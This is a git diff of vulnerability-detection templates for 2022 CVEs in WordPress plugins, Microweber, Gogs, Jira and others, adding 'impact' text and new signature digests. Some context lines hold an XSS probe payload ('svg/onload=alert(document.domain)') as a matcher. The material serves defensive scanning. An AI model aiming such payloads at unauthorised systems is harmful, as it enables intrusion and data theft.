-# digest: 4b0a0048304602210091e63b5152c67079451b18a198d89d75771b1c7950a68f0649f6c4a93b8b1be002210087cf00285d709471a6e1b98ce5ca8111adb750276057c67578dc93c97f949b85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a5a3507d7d196fd1a10e1820ef924fc662b139dd0df190847b80db1a0f2d4af702205e641d5c9a995ab6bcabf0a47e8520f7dbcf7015810ec36d02f86f3283c092af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml
index 4f2f7b53b9..bd3cb56508 100644
--- a/http/cves/2022/CVE-2022-0349.yaml
+++ b/http/cves/2022/CVE-2022-0349.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Update to the latest version of the WordPress NotificationX plugin (2.3.9 or higher) to mitigate the SQL Injection vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "\"data\":{\"success\":true}")'
         condition: and
-# digest: 4b0a00483046022100dec85b05b890009e3ff6d234eccfef099eb7d40a8dce8bf9b49cd65857609e7c022100b1ca74c9304594388b316c8055088f543b44b6531048d3152ecfb67625d55609:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200c0be9debf272996052abdfc830fcd6aaf116b7d9cca8c8b80dd8c3b7ac21246022027eb2b900c83ce16efa48d89c6542b31ea86c8ca7ef4a506cb64d74bc248e21e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml
index 721318c615..dd221379d4 100644
--- a/http/cves/2022/CVE-2022-0378.yaml
+++ b/http/cves/2022/CVE-2022-0378.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a version that has addressed the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202295ac3432471ee98337631811e10fb90fa13463b5fb5602e38ee446083e687e02200df78770b2d18e8d27d10a2765c54328e07cc7f0b42e34cf0325944dbc55719a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100893b544817f30e47c93d3762449982878da3e9a5aa18f8929853996cb29c90af022100f7e93e6fb091ef6df1c107ac775eb99db8bfa0f65a13232b272ddbf04b165d35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml
index a7bbc0016a..2d6e584331 100644
--- a/http/cves/2022/CVE-2022-0381.yaml
+++ b/http/cves/2022/CVE-2022-0381.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Embed Swagger plugin 1.0.0 and prior contains a reflected cross-site scripting vulnerability due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file, which allows attackers to inject arbitrary web scripts onto the page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Embed Swagger plugin (1.0.0) or apply a patch provided by the vendor.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ab5555f542129f6cc2fb5a214fd3b604090f0c40e3d0ac973d8006240d774b20022100b5a73552dd928c997c881a78583ec36f1d35f0201772793e08f9eaa06be4e1b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009fcce508edf99e60891548d3cfe1263b2ee4ecb07aba15436a2ae4e9822a741502204761ed4c7d041239fbd0f6138312a494eda68311c2b6e38208e9c8199e076b11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml
index fac17eaacd..644ce51ad0 100644
--- a/http/cves/2022/CVE-2022-0412.yaml
+++ b/http/cves/2022/CVE-2022-0412.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: |
     Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher).
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 490a0046304402206b9d4e5f7152778e922193753e34e0e8eee0951d13fb17e8a782d3f74a36a4830220206efe4ba7b61d59c0fccbf4e0518eb2f187019132a1761ac0b873cf5962596c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220791a512b1aeda6dd369922529c17ff9fc6da17dabb6bff7d6412cbee753b89f4022100dc5868fb8deef45938e10a772be5ce87dbf2e5bfcd95e524d3143f6b9dddaa45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml
index 809da0d643..d8feb8c22d 100644
--- a/http/cves/2022/CVE-2022-0415.yaml
+++ b/http/cves/2022/CVE-2022-0415.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: Fixed in version 0.12.6.
   reference:
     - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
@@ -114,4 +116,4 @@ http:
         regex:
           - ' "uuid": "(.*)"'
         internal: true
-# digest: 4a0a004730450221009fdaebec41f1813a07ace92784d9b376f0700f9b855fc24b832de5f950673a4e0220718fa229f444dca2d3a16535d0c71df1129fb7f7b403a35321717961afbaceba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022018161f44639a28492091b30df426997eebc5707f0bb3a3d8a7181db03b807d89022100b67ad3ed5998dd8517eb6db47e0efcc841bdef6b340b4ecbe948a070437c3e2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml
index 56a4c2f24d..1aa3e42d11 100644
--- a/http/cves/2022/CVE-2022-0422.yaml
+++ b/http/cves/2022/CVE-2022-0422.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b0bdaf371c32c0630b787723a551aebfc1bd7d338cd37774a97f8fc8bd814584022061d316c01fbf722e82a92a4ab9323682aeae586859c24fbcef8ff6daca8f741f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c8be654729085b8c4013a875e8c738e6d9af39fa53dd7e0bcdca9b73bd1fa2fc022100807daa4691156137dd374db848bd819c692c97f19abaa492c3d2dc87e57d38c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml
index e6bbe447fe..47283565d7 100644
--- a/http/cves/2022/CVE-2022-0432.yaml
+++ b/http/cves/2022/CVE-2022-0432.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.
+  impact: |
+    Remote code execution
   remediation: |
     Apply the latest security patches and updates provided by the Mastodon project to mitigate the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ac41d77817611e4e77c87b31a1a027bc6e025357fcb0f4b2a8c12c1e73efd8e0022018302bdd7746c1029e2743501e85661e738efdd928f88cbf53e846259aca4df6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dc93a30fbd72183b4c204fc91b9938b733b3f252ab5ba4b7e8d051fd7a465b25022007a4d41ee62f7c7c3f553b4f756b93b7336b1ea6a716b451b5d9f7b52ef840e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml
index cde68a1eb7..c44d97fb89 100644
--- a/http/cves/2022/CVE-2022-0434.yaml
+++ b/http/cves/2022/CVE-2022-0434.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability.  It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: |
     Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220030f11ce897533f1d250bf938e8c42dd68af33f5e466522d6b134efbb3ac70c7022100a681e623886e381d2e8e5d41338fe00cc7d16dc3b2ca48118ad6c7979f73c8c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009faa4dc406a7b2d73a16192a11ae262daae22d83fec4ce96aa15431bc4df212502204cc791826982505018b94f8e0956c93aa737edde474434aceb72dfc0cc0b7b87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml
index d4527935da..7384eb2b69 100644
--- a/http/cves/2022/CVE-2022-0437.yaml
+++ b/http/cves/2022/CVE-2022-0437.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
         regex:
           - "(?m)VERSION: '([0-9.]+)'"
         internal: true
-# digest: 490a004630440220722cc93e129913d7756886e6f3742c07686e1204a1fbf9e2a0fbbe3f45649c9e02201082f3f7bd5ccb3329bfa6bb8c0d2b4a73183e3434df8fff88952c4339c55f17:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fd80fe8effc4be25c911dd53099699b99f6152d1c67be02218dd9cf047315189022100e706f52c9d002f00ee0d701fbc6d89abbff33f976e75bf7ece7300993221e97f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml
index df7ba2f4a7..2119fd14bb 100644
--- a/http/cves/2022/CVE-2022-0441.yaml
+++ b/http/cves/2022/CVE-2022-0441.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially compromising user data and system integrity.
   remediation: |
     Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue.
   reference:
@@ -76,4 +78,4 @@ http:
         kval:
           - user_email
           - password
-# digest: 4b0a004830460221009ab64e1ee5b1abfa6c0e16a2809a3a27d08a6c849afd3338f1fa52f4da827c61022100ddaf6c1762c77a183a05ff723a7d574ce8d868fe036ee98f320b07c249431b4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220638d88b577e6f5f9e56c2356f46af3225ffe9ef0a0d7563c795f731ad8123cbb022047f8e3d3ad5f40c29c3e269bb74369415fc589020d9e4db1cf37a4aa15fb8e0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml
index 43b57edf9e..ebea23fbd2 100644
--- a/http/cves/2022/CVE-2022-0482.yaml
+++ b/http/cves/2022/CVE-2022-0482.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions.
   remediation: |
     Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         kval:
           - "csrfCookie"
         part: header
-# digest: 4a0a00473045022100f24c3e1394ef76e5f9ea0c2a8f28cc513a77b9ba8090fab652401c8ffea8cd2d02202312ea67793d723d5ecf6804a187fcf2a2d0d4ef51692da3ad85e6deb89b31f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ce61a3d3560a8e21ee5bcfda49670ce8cd621b4aeb51300bf8f751ed73f38e7d02200545802d4513381d207ab95a59eb13f00c1fb646037e78bb38044e43832c0f27:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml
index 0d5bb31ec7..18c28cdf3a 100644
--- a/http/cves/2022/CVE-2022-0535.yaml
+++ b/http/cves/2022/CVE-2022-0535.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update the WordPress E2Pdf plugin to version 1.16.45 or later to mitigate the vulnerability.
   reference:
@@ -67,4 +69,4 @@ http:
         regex:
           - 'name="_nonce" value="([0-9a-zA-Z]+)"'
         internal: true
-# digest: 4a0a0047304502201259b3a28b352eda9094cfb230ffaf3b0d2235a4ad9626d08ca20a5ceeeaf63502210097254c6ea27acf534fba001418e40c9353be5e06a9f0fc12a1222bbd08cab021:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd7095af5fac7c8a3c6ce0e6bbd854cc7b6464e5666c5ce617e99c9ac940018a02200660f6f2a130f56e0ea04ce68ff83795716afd941c4e01ad0fe96862753c1114:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml
index 69e2bb6e98..908540ea05 100644
--- a/http/cves/2022/CVE-2022-0540.yaml
+++ b/http/cves/2022/CVE-2022-0540.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential disruption of business operations.
   remediation: Ensure you are using the latest version and that all security patches have been applied.
   reference:
     - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207c63c0f4f77902a269ca9d0ae38acd37719fd4e80b8b924f3ad79034d2205e6e022100b12b5712e59bcf3e4a8dd5624b87f768cf519485d758c74b51659fe7da1601fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009f961143639d892eda128db630431e236bc0866e5bd43148043004f4f304d3be022100ce792858917aae504dbb070baf391505e94cce94b81d1349a43bea02a131a2f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml
index d7a360f39d..a213516107 100644
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Formcraft3 before version 3.8.2  does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
+  impact: |
+    An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning.
   remediation: |
     Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: WordPress"
-# digest: 4b0a00483046022100f947d84a5bf75e6cca9a11e1b885c5719f920631264a38d8f80cd4546ba5f304022100c43fceae3b929ac22007207b427f811b3d0bb7c57cd67e400a7d04dbcbae9fb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022055d90af4e396c3f45bdc927d44c1a14ceb850e8d006b89ef219288c52fa91452022057407bb87f314a5e3013d13809fe25ff28b46a9bc7e7b6ccb8415e8f0895c54a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml
index b7c6f6931e..cf5568bef6 100644
--- a/http/cves/2022/CVE-2022-0594.yaml
+++ b/http/cves/2022/CVE-2022-0594.yaml
@@ -5,6 +5,8 @@ info:
   author: atomiczsec
   severity: medium
   description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: |
     Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220334816e4788c456aab465946481a5c2edc828daedca6d534b048a67904e3ff0202200f35a3fcffff4352a43107ddfb282e6030294e8db6cf7c81a90d3029c5a47596:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202240552f28c31f18475cf01e0839da8e4d003adee7d341a6acff3d9c3e4ed26f02205caa0ad0e76c7ff22f1330aa4d7c6357e7add35c12e309d59ef303dd4befe7e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml
index e0e5b5f7bd..da15df9dca 100644
--- a/http/cves/2022/CVE-2022-0595.yaml
+++ b/http/cves/2022/CVE-2022-0595.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
   remediation: |
     Update the WordPress Contact Form 7 plugin to version 1.3.6.3 or later to mitigate the vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
           - 'contains(body_2, "alert(document.domain)")'
           - 'status_code_2 == 200'
         condition: and
-# digest: 4a0a0047304502206df7746df01d79e502bc0e6f9da7b07f32b99034ea77214b7659d1b0bc2b35f7022100cabdd4b8a68877cfc8de4ea4ea2fc0dc1617715292e51fc7c52310d4313ce9cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200e666e03a72b83055f70e1befe13bbb023fd3ae2d8bec2943a239c5ef7232349022100ed08570688f042a49826e2ccadee923d3b6e103a50a8a003208da7ce63f59bd7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml
index bf6a81db9e..73657928bf 100644
--- a/http/cves/2022/CVE-2022-0599.yaml
+++ b/http/cves/2022/CVE-2022-0599.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
         part: body
         words:
           - 'id="mmursp_id" value="\"><svg/onload=alert(document.domain)>" />'
-# digest: 490a00463044022029855b31904fc9e08452fefc9e5d360edb1423c4957c620dc779230976eb07ed02203422b96dc28246035253abf67c4ae0d5aee9f1ff50fc33c5306c4f4a5e128159:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d5b453035f9cab90cacc1381519c545ce1a0b4db39a6227d609e15e40666fc8902200beb2e88b2de43bf564047c55dc6b51e07bcebde791c68bdd31ce03dc12fd795:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml
index 302203477e..fb1835a792 100644
--- a/http/cves/2022/CVE-2022-0653.yaml
+++ b/http/cves/2022/CVE-2022-0653.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Upgrade to version 3.6.5 or later.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207a32932835a028822765d764cb1b41cbc7e939cd26473a948dada8716a65a80f02204af522a23be599c77017e25eeea78748a9c2fa22aa5a45ff2ed158f9bca96816:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c159e38d2c7444a3074789923f12c3ed13129d52f9d8f47cc104129d47d034c1022100abcdb8678a67655457315b83248cb45a7bf05b88ed544b9a84a1fcaab46c6364:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml
index 3dfb3eb979..8ea2e67097 100644
--- a/http/cves/2022/CVE-2022-0656.yaml
+++ b/http/cves/2022/CVE-2022-0656.yaml
@@ -5,6 +5,8 @@ info:
   author: akincibor
   severity: high
   description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a024adf99e9f5d69340cb8abbbd6b05a27eff81b1b895aee4d39bda98a61303802201700324870d5e37bf9924f5c796d77fd269388bae21feec93aed38d778de4a13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d28352fa45d08d95faeb11005e2c860b739d88deb45cc7065fec3300332c943902204e09185cb4164c11050b61fc5973bb2a9571bd1479003d415b9427bae6123786:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml
index a869e5e167..7e32f5cd53 100644
--- a/http/cves/2022/CVE-2022-0660.yaml
+++ b/http/cves/2022/CVE-2022-0660.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
   remediation: |
     Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_2,"text/html")'
           - 'status_code_2==500'
         condition: and
-# digest: 490a004630440220510342a6e9f0aaa042e5c87356735d1fa3109f2daa013b4aabf860e94ed8dcf302203cf58bb494a5a86abd13d460d692cf6212c03c58ddf2c4687035798a85521024:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f79de3bd01532ec6437871cbb4f79b9ac648575e17a3b0d6f41233944f611970022100856341ae202e6477e8a3a2cd50079f68a456a404a20cf11d5dd394a4bf88a72f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml
index 6bb7b0fdb8..c3926f191d 100644
--- a/http/cves/2022/CVE-2022-0678.yaml
+++ b/http/cves/2022/CVE-2022-0678.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade Microweber CMS to version 1.2.11 or later, which includes a fix for this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4a0a00473045022100c79286ed59b7b40f984ab78bead44a5beedc71bcc829e9bf9042bff4985f9b750220130d797beaa37bc3c2f4994984af95eb719c0459d075e5c70f0c3aa6a994e451:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210095e39e997573c9bbe6e6e45fb61dfa015cf56532abd17d5c5011bbfdeca98d3b022100aec44fb28236a6e94a0716e5ef372ed943888aaa861ebc8f9c25044b86c7fe6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml
index 31ed380296..a78f690b94 100644
--- a/http/cves/2022/CVE-2022-0679.yaml
+++ b/http/cves/2022/CVE-2022-0679.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
   remediation: |
     Update to the latest version of the WordPress Narnoo Distributor plugin (>=2.5.2) to mitigate the LFI vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d3789bdd19af14e46442cc7fa1c33e7b4c1aae56839e1f8deab61650d7fa37d6022070fcbfc541335ecdd0bcfbb9168952c73935f8759954da6e293e10c98534192e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
